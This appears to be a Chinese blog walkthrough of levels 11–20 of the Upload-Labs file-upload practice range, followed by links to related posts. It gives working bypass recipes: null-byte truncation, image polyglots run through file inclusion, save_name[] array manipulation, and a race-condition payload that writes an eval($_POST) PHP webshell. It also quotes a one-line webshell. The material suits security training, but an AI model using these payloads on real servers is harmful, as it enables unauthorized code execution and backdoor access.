Upload-Labs靶场攻略(下)

Pass-11

GET型传参,上传目录可设置,考虑00截断,在/upload/后添加1.php%00,即可上传

Pass-12

POST型传参,上传目录可设置,POST型会不会进行URL编码,所以在/upload/后添加1.php%00,并且将%00用URL进行编码。编码后为空白符号,即可上传

Pass-13

文件包含,上传图片码1.jpg,利用文件包含将JPG内容当作PHP进行解析

生成图片码命令

  1. copy 1.jpg /b + 1.php /a 2.jpg
  2.  
  3. 192.168.28.128/uploadlab/include.php?file=upload/1420210717064745.png

Pass-14

同第13关

Pass-15

同14关

Pass-16

二次渲染,依旧上传图片码,找到未被渲染的位置,用C32将一句话木马插入。依旧上传,采用文件包含即可。

Pass-17

条件竞争,服务器端将上传的文件进行先保存再判断,如果正确则重命名,否则删除。

通过爆破持续上传,然后通过访问,生成新的木马文件。

上传的木马如下:

  1. <?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST[123]) ?>’);
  2. ?>

上传后进行爆破访问,生成webshell.php即为后门文件

Pass-18

图片马加条件竞争,先上传图片马,然后通过文件包含访问图片马,生产Webshell文件

Pass-19

%00截断,方法同Pass-12

Pass-20

进行代码审计,类似CTF

MIME首先得是image/png、image/gif、image/jpg

  1. if (!is_array($file)) {
  2. $file = explode('.', strtolower($file));
  3. }

会根据.将$file先转化为小写再打散成数组。

  1. $ext = end($file);
  2. $allow_suffix = array('jpg','png','gif');
  3. if (!in_array($ext, $allow_suffix)) {
  4. $msg = "禁止上传该后缀文件!";
  5. }

会对数组中最后一个值进行判断是否是jpg,png,gif结尾

  1. $file_name = reset($file) . '.' . $file[count($file) - 1];

将数组的第一个值和倒数第二个值进行拼接。

所以我们考虑数组的最后一个值必须是jpg,第一个和第二个值还需要再考虑

  1. if (move_uploaded_file($temp_file, $img_path)) {
  2. $msg = "文件上传成功!";
  3. $is_upload = true;
  4. }

这边可以看到将临时文件存储再img_path,所以img_path其实可以根据传入的save_name[]数组进行操控。

而move_uploaded_file在执行的时候会忽略末尾的/.,所以根据拼接

save_name[0]=web.php/

save_name[1]为空

save_name[2]=jpg

注意POST上传改包的数据包型式即可。

总结:文件上传的种类和手法:

1.前端JS验证:禁用JS,Burp抓包修改

2.只检查Content-type,修改MIME

3.黑名单绕过:爆破尾缀

4.系统配置文件重写,.htaccess,.nginx

5.大小写绕过、尾缀添加点,空格,下划线绕过,添加::$DATA

6.过滤敏感词汇使用双写绕过

7.上传目录可控可以使用00截断,GET传参不需要编码,POST需要进行编码成为空白

8.存在文件包含漏洞可上传图片马,进行包含

9.条件竞争是服务器处理上的逻辑漏洞,需要爆破上传和爆破访问

10.代码审计需要理清楚一步一步的上传逻辑

Upload-labs 文件上传靶场通关攻略(下)的更多相关文章

  1. Upload-labs 文件上传靶场通关攻略(上)

    Upload-labs 文件上传靶场通关攻略(上) 文件上传是Web网页中常见的功能之一,通常情况下恶意的文件上传,会形成漏洞. 逻辑是这样的:用户通过上传点上传了恶意文件,通过服务器的校验后保存到指 ...

  2. Web文件上传靶场 - 通关笔记

    Web应用程序通常会提供一些上传功能,比如上传头像,图片资源等,只要与资源传输有关的地方就可能存在上传漏洞,上传漏洞归根结底是程序员在对用户文件上传时控制不足或者是处理的缺陷导致的,文件上传漏洞在渗透 ...

  3. DVWA靶场之File Upload(文件上传)通关

    Low: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_pa ...

  4. 【DVWA】File Upload(文件上传漏洞)通关教程

    日期:2019-08-01 17:28:33 更新: 作者:Bay0net 介绍: 0x01. 漏洞介绍 在渗透测试过程中,能够快速获取服务器权限的一个办法. 如果开发者对上传的内容过滤的不严,那么就 ...

  5. upload.php --->文件上传

    <?php header("Content-type:text/html;charset=utf-8"); print_r($_FILES['file']); $filena ...

  6. PHP系列 | Thinkphp3.2 上传七牛 bad token 问题 [ layui.upload 图片/文件上传]

    前端代码 <div class="logo_out" id="upload-logo"></div> JS代码 /** * 上传图片 * ...

  7. DVWA全级别之File Upload(文件上传)

    File Upload File Upload,即文件上传漏洞,通常是由于对上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带 ...

  8. File Upload(文件上传)

    一句话木马 <?php @eval($_POST['key']); ?> /*eval(phpcode) eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP ...

  9. 从本地向 Github 上传项目步骤攻略(快速上手版)

    最近想把之前自己做的一些好玩的项目共享到Github,网上找了一圈上传教程,都感觉写的太深奥.复杂,云里雾里,特把自己的方法纪录如下: PS:这种方式一般适用于:开始做项目时,没有直接在github上 ...

随机推荐

  1. Docker搭建Jenkins+Gogs+Maven/Gradle——代码自动化运维部署平台(三)

    一.简介 1.CI/CD CI/CD 是一种通过在应用开发阶段引入自动化来频繁向客户交付应用的方法.CI/CD 的核心概念是持续集成.持续交付和持续部署.作为一个面向开发和运营团队的解决方案,CI/C ...

  2. SpringBoot:Sqlite3+SpringBoot2.1.3+Mybatis-Puls整合项目

    应公司要求完成sqlite3数据库的增改查小功能,特此记录一下. 1.建造项目 结构如下 因为是提供给前端调用所以做了接口. 2.Pom依赖文件 下面是这个项目所依赖的jar包. <parent ...

  3. SpringCloud:Zuul路由配置超时问题

    测试访问时长 修改下业务类,增加sleep休眠时长,以此查看Zuul的熔断 @GetMapping("/test1") public Object test1() { try { ...

  4. Nginx:Nginx配置url重定向

    符号含义: 正则表达式匹配: ~ 为区分大小写匹配 ~* 为不区分大小写匹配 !~和!~*分别为区分大小写不匹配及不区分大小写不匹配 文件及目录匹配: -f和!-f用来判断是否存在文件 -d和!-d用 ...

  5. Mybatis代码自动生成(含测试)

    一.建立数据库 create database shixun; use shixun; create table user( id int primary key auto_increment , u ...

  6. 单点登录(SSO)实现原理(转)

    简介 单点登录是在多个应用系统中,用户只需要登录一次就可以访问所有相互信任的应用系统的保护资源,若用户在某个应用系统中进行注销登录,所有的应用系统都不能再直接访问保护资源,像一些知名的大型网站,如:淘 ...

  7. 前端-Vue基础1

    Vue核心思想:只要改变数据,页面就会发生改变 1.引入vue 1.下载vue.js 2.在script标签的src属性中,引入vue.js <script src="js/vue.j ...

  8. python远程备份mysql并压缩

    import osimport timeimport tarfileimport zipfile'''mysqldumpUsage: mysqldump [OPTIONS] database [tab ...

  9. ti

    一.选择题DCBCDCDACAACBBABACBDCBBDA二.简答题(每小题5分,共20分)1. 1)简洁紧凑,灵活方便2)运算符丰富3)数据类型丰富4)C语言是结构化语言5)语法限制较少,程序设计 ...

  10. [源码解析] 深度学习分布式训练框架 horovod (18) --- kubeflow tf-operator

    [源码解析] 深度学习分布式训练框架 horovod (18) --- kubeflow tf-operator 目录 [源码解析] 深度学习分布式训练框架 horovod (18) --- kube ...